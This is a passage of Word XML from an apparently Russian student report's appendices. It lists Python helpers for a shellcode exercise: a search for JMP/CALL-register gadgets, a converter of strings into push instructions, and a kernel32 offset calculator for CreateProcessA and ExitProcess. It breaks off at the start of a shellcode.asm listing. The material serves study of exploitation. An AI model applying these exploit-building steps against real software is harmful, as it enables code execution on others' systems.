    <w:p w14:paraId="19D137BB" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="007C4A57" w:rsidRDefault="00296514" w:rsidP="00CD2A99">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">'FOUND INSTRUCTIONS (JMP/CALL REGISTER)', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>found_instructions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E933C00" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="007C4A57" w:rsidRDefault="00CD2A99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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53CEC0" w14:textId="32D3D9BF" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af9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4C2F545C" w14:textId="460B98A7" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DABFF" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>input_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>input(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>Введите</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>строку</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC3072" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>padding_needed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = (4 - (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>input_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>) % 4)) % 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB8B51" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>padded_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>input_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> + '\x00' * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>padding_needed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="467C4651" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>reversed_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>padded_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>[::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A26B7E" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>Перевёрнутая</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>строка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>repr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>reversed_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0280FC" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>bytes_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>reversed_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>string.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B36F0" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>bytes_data.hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817648A" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">"Hex:", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2478C353" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>Формат</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>XXXXXXXXh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9FBAD" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>), 8):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76690259" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">    chunk = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>i:i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>+8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE2F3B" w14:textId="358BFCC1" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>f"push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> 0x{chunk}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373E410" w14:textId="77777777" w:rsidR="00CD2A99" w:rsidRPr="007C4A57" w:rsidRDefault="00CD2A99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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1566C852" w14:textId="05F10D1C" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FBC1F" w14:textId="2EF4D9B4" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidR="009460A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:r w:rsidR="009460A1" w:rsidRPr="00862EC0">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="009460A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAFAED6" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>Базовый</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>адрес</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> kernel32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD30C4D" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00862EC0">
        <w:t>kernel32_base = 0x76030000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8BC787" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067272EB" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>Адреса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>функций</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FAF51EC" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> = 0x76065150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E6BF8C" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> = 0x76056a20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F3E98" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192113CE" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>Расчет</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>смещений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25017D5C" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>offset_CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> - kernel32_base </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4532FCC0" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>offset_ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> - kernel32_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501732C8" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2504051D" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>f"CreateProcessA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> offset: 0x{offset_CreateProcessA:08X}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDE3CE" w14:textId="2644F6F0" w:rsidR="00CD2A99" w:rsidRPr="00862EC0" w:rsidRDefault="00862EC0" w:rsidP="00862EC0">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t>f"ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00862EC0">
        <w:t xml:space="preserve"> offset: 0x{offset_ExitProcess:08X}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38796966" w14:textId="77777777" w:rsidR="00862EC0" w:rsidRPr="007C4A57" w:rsidRDefault="00862EC0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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D96075" w14:textId="03D13372" w:rsidR="00CD2A99" w:rsidRPr="00B91720" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r w:rsidR="00B91720">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22561D7B" w14:textId="3B006DB8" w:rsidR="00CD2A99" w:rsidRPr="00CD2A99" w:rsidRDefault="00CD2A99" w:rsidP="00CD2A99">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008B265C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B265C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD2A99">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E2DB9" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>[BITS 32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CF14B" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9190FA" w14:textId="77777777" w:rsidR="008D7D62" w:rsidRDefault="008D7D62" w:rsidP="008D7D62">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>section .text</w:t>
      </w:r>
    </w:p>
